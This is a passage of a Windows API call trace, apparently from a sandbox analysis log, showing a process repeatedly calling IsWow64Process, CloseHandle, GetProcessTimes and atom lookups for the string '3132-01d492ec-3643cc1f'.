	[0129.289] CloseHandle (hObject=0x2dc) returned 1
	[0129.324] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.328] CloseHandle (hObject=0x2dc) returned 1
	[0129.328] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.328] CloseHandle (hObject=0x2dc) returned 1
	[0129.329] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.329] CloseHandle (hObject=0x2dc) returned 1
	[0129.329] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.329] CloseHandle (hObject=0x2dc) returned 1
	[0129.329] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.329] CloseHandle (hObject=0x2dc) returned 1
	[0129.329] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.329] CloseHandle (hObject=0x2dc) returned 1
	[0129.330] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.330] CloseHandle (hObject=0x2dc) returned 1
	[0129.330] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.330] CloseHandle (hObject=0x2dc) returned 1
	[0129.330] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.331] CloseHandle (hObject=0x2dc) returned 1
	[0129.331] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.331] CloseHandle (hObject=0x2dc) returned 1
	[0129.331] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.331] CloseHandle (hObject=0x2dc) returned 1
	[0129.331] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.331] CloseHandle (hObject=0x2dc) returned 1
	[0129.332] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.332] CloseHandle (hObject=0x2dc) returned 1
	[0129.332] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.332] CloseHandle (hObject=0x2dc) returned 1
	[0129.332] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.332] CloseHandle (hObject=0x2dc) returned 1
	[0129.332] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.332] CloseHandle (hObject=0x2dc) returned 1
	[0129.333] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.333] CloseHandle (hObject=0x2dc) returned 1
	[0129.333] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.333] CloseHandle (hObject=0x2dc) returned 1
	[0129.333] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.334] CloseHandle (hObject=0x2dc) returned 1
	[0129.334] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.334] CloseHandle (hObject=0x2dc) returned 1
	[0129.334] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.334] CloseHandle (hObject=0x2dc) returned 1
	[0129.334] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.334] CloseHandle (hObject=0x2dc) returned 1
	[0129.334] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.334] CloseHandle (hObject=0x2dc) returned 1
	[0129.335] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.335] CloseHandle (hObject=0x2dc) returned 1
	[0129.335] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.335] CloseHandle (hObject=0x2dc) returned 1
	[0129.336] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.336] CloseHandle (hObject=0x2dc) returned 1
	[0129.336] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.336] CloseHandle (hObject=0x2dc) returned 1
	[0129.336] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.336] CloseHandle (hObject=0x2dc) returned 1
	[0129.336] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.336] CloseHandle (hObject=0x2dc) returned 1
	[0129.337] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.337] CloseHandle (hObject=0x2dc) returned 1
	[0129.337] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.337] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0129.337] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0129.338] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.338] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0129.339] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.339] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0129.339] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0129.339] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0129.339] CloseHandle (hObject=0x2dc) returned 1
	[0129.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0129.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.340] CloseHandle (hObject=0x2dc) returned 1
	[0129.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.340] CloseHandle (hObject=0x2dc) returned 1
	[0129.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.340] CloseHandle (hObject=0x2dc) returned 1
	[0129.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.341] CloseHandle (hObject=0x2dc) returned 1
	[0129.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.341] CloseHandle (hObject=0x2dc) returned 1
	[0129.374] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.374] CloseHandle (hObject=0x2dc) returned 1
	[0129.374] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.374] CloseHandle (hObject=0x2dc) returned 1
	[0129.375] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.375] CloseHandle (hObject=0x2dc) returned 1
	[0129.375] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.375] CloseHandle (hObject=0x2dc) returned 1
	[0129.375] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.375] CloseHandle (hObject=0x2dc) returned 1
	[0129.375] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.375] CloseHandle (hObject=0x2dc) returned 1
	[0129.376] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.376] CloseHandle (hObject=0x2dc) returned 1
	[0129.376] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.376] CloseHandle (hObject=0x2dc) returned 1
	[0129.376] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.376] CloseHandle (hObject=0x2dc) returned 1
	[0129.376] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.376] CloseHandle (hObject=0x2dc) returned 1
	[0129.377] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.377] CloseHandle (hObject=0x2dc) returned 1
	[0129.377] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.377] CloseHandle (hObject=0x2dc) returned 1
	[0129.377] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.377] CloseHandle (hObject=0x2dc) returned 1
	[0129.377] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.377] CloseHandle (hObject=0x2dc) returned 1
	[0129.377] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.377] CloseHandle (hObject=0x2dc) returned 1
	[0129.378] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.378] CloseHandle (hObject=0x2dc) returned 1
	[0129.378] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.378] CloseHandle (hObject=0x2dc) returned 1
	[0129.378] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.378] CloseHandle (hObject=0x2dc) returned 1
	[0129.378] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.378] CloseHandle (hObject=0x2dc) returned 1
	[0129.379] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.379] CloseHandle (hObject=0x2dc) returned 1
	[0129.379] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.379] CloseHandle (hObject=0x2dc) returned 1
	[0129.379] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.379] CloseHandle (hObject=0x2dc) returned 1
	[0129.380] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.380] CloseHandle (hObject=0x2dc) returned 1
	[0129.380] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.380] CloseHandle (hObject=0x2dc) returned 1
	[0129.380] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.380] CloseHandle (hObject=0x2dc) returned 1
	[0129.380] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.380] CloseHandle (hObject=0x2dc) returned 1
	[0129.380] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.380] CloseHandle (hObject=0x2dc) returned 1
	[0129.381] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.381] CloseHandle (hObject=0x2dc) returned 1
	[0129.381] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.381] CloseHandle (hObject=0x2dc) returned 1
	[0129.381] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.381] CloseHandle (hObject=0x2dc) returned 1
	[0129.382] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.382] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0129.382] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0129.382] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.382] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0129.383] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.383] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0129.383] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0129.383] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0129.383] CloseHandle (hObject=0x2dc) returned 1
	[0129.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0129.383] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.383] CloseHandle (hObject=0x2dc) returned 1
	[0129.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.384] CloseHandle (hObject=0x2dc) returned 1
	[0129.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.384] CloseHandle (hObject=0x2dc) returned 1
	[0129.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.384] CloseHandle (hObject=0x2dc) returned 1
	[0129.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.384] CloseHandle (hObject=0x2dc) returned 1
	[0129.417] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.418] CloseHandle (hObject=0x2dc) returned 1
	[0129.418] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.418] CloseHandle (hObject=0x2dc) returned 1
	[0129.418] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.418] CloseHandle (hObject=0x2dc) returned 1
	[0129.418] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.418] CloseHandle (hObject=0x2dc) returned 1
	[0129.418] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.418] CloseHandle (hObject=0x2dc) returned 1
	[0129.419] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.419] CloseHandle (hObject=0x2dc) returned 1
	[0129.419] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.419] CloseHandle (hObject=0x2dc) returned 1
	[0129.419] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.419] CloseHandle (hObject=0x2dc) returned 1
	[0129.420] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.420] CloseHandle (hObject=0x2dc) returned 1
	[0129.420] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.420] CloseHandle (hObject=0x2dc) returned 1
	[0129.420] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.420] CloseHandle (hObject=0x2dc) returned 1
	[0129.420] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.420] CloseHandle (hObject=0x2dc) returned 1
	[0129.421] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.421] CloseHandle (hObject=0x2dc) returned 1
	[0129.421] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.421] CloseHandle (hObject=0x2dc) returned 1
	[0129.421] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.421] CloseHandle (hObject=0x2dc) returned 1
	[0129.421] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.421] CloseHandle (hObject=0x2dc) returned 1
	[0129.422] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.422] CloseHandle (hObject=0x2dc) returned 1
	[0129.422] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.422] CloseHandle (hObject=0x2dc) returned 1
	[0129.422] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.422] CloseHandle (hObject=0x2dc) returned 1
	[0129.422] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.422] CloseHandle (hObject=0x2dc) returned 1
	[0129.423] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.423] CloseHandle (hObject=0x2dc) returned 1
	[0129.423] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.423] CloseHandle (hObject=0x2dc) returned 1
	[0129.423] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.423] CloseHandle (hObject=0x2dc) returned 1
	[0129.423] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.423] CloseHandle (hObject=0x2dc) returned 1
	[0129.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.424] CloseHandle (hObject=0x2dc) returned 1
	[0129.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.424] CloseHandle (hObject=0x2dc) returned 1
	[0129.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.424] CloseHandle (hObject=0x2dc) returned 1
	[0129.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.424] CloseHandle (hObject=0x2dc) returned 1
	[0129.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.424] CloseHandle (hObject=0x2dc) returned 1
	[0129.425] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.425] CloseHandle (hObject=0x2dc) returned 1
	[0129.425] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.425] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0129.425] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0129.426] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.426] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0129.426] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.426] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0129.426] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0129.426] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0129.426] CloseHandle (hObject=0x2dc) returned 1
	[0129.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0129.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.427] CloseHandle (hObject=0x2dc) returned 1
	[0129.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.427] CloseHandle (hObject=0x2dc) returned 1
	[0129.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.427] CloseHandle (hObject=0x2dc) returned 1
	[0129.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.427] CloseHandle (hObject=0x2dc) returned 1
	[0129.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.428] CloseHandle (hObject=0x2dc) returned 1
	[0129.460] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.460] CloseHandle (hObject=0x2dc) returned 1
	[0129.460] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.460] CloseHandle (hObject=0x2dc) returned 1
	[0129.460] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.460] CloseHandle (hObject=0x2dc) returned 1
	[0129.461] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.461] CloseHandle (hObject=0x2dc) returned 1
	[0129.461] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.461] CloseHandle (hObject=0x2dc) returned 1
	[0129.461] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.461] CloseHandle (hObject=0x2dc) returned 1
	[0129.461] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.461] CloseHandle (hObject=0x2dc) returned 1
	[0129.462] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.462] CloseHandle (hObject=0x2dc) returned 1
	[0129.462] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.462] CloseHandle (hObject=0x2dc) returned 1
	[0129.462] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.462] CloseHandle (hObject=0x2dc) returned 1
	[0129.462] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.462] CloseHandle (hObject=0x2dc) returned 1
	[0129.463] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.463] CloseHandle (hObject=0x2dc) returned 1
	[0129.463] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.463] CloseHandle (hObject=0x2dc) returned 1
	[0129.463] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.463] CloseHandle (hObject=0x2dc) returned 1
	[0129.463] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.463] CloseHandle (hObject=0x2dc) returned 1
	[0129.464] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.464] CloseHandle (hObject=0x2dc) returned 1
	[0129.464] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.464] CloseHandle (hObject=0x2dc) returned 1
	[0129.464] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.464] CloseHandle (hObject=0x2dc) returned 1
	[0129.464] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.464] CloseHandle (hObject=0x2dc) returned 1
	[0129.464] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.465] CloseHandle (hObject=0x2dc) returned 1
	[0129.465] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.465] CloseHandle (hObject=0x2dc) returned 1
	[0129.465] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.465] CloseHandle (hObject=0x2dc) returned 1
	[0129.465] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.465] CloseHandle (hObject=0x2dc) returned 1
	[0129.465] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.465] CloseHandle (hObject=0x2dc) returned 1
	[0129.466] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.466] CloseHandle (hObject=0x2dc) returned 1
	[0129.466] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.466] CloseHandle (hObject=0x2dc) returned 1
	[0129.466] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.466] CloseHandle (hObject=0x2dc) returned 1
	[0129.466] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.466] CloseHandle (hObject=0x2dc) returned 1
	[0129.467] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.467] CloseHandle (hObject=0x2dc) returned 1
	[0129.467] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.467] CloseHandle (hObject=0x2dc) returned 1
	[0129.467] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.467] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0129.467] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0129.468] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.468] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0129.468] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.468] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0129.468] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0129.468] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0129.469] CloseHandle (hObject=0x2dc) returned 1
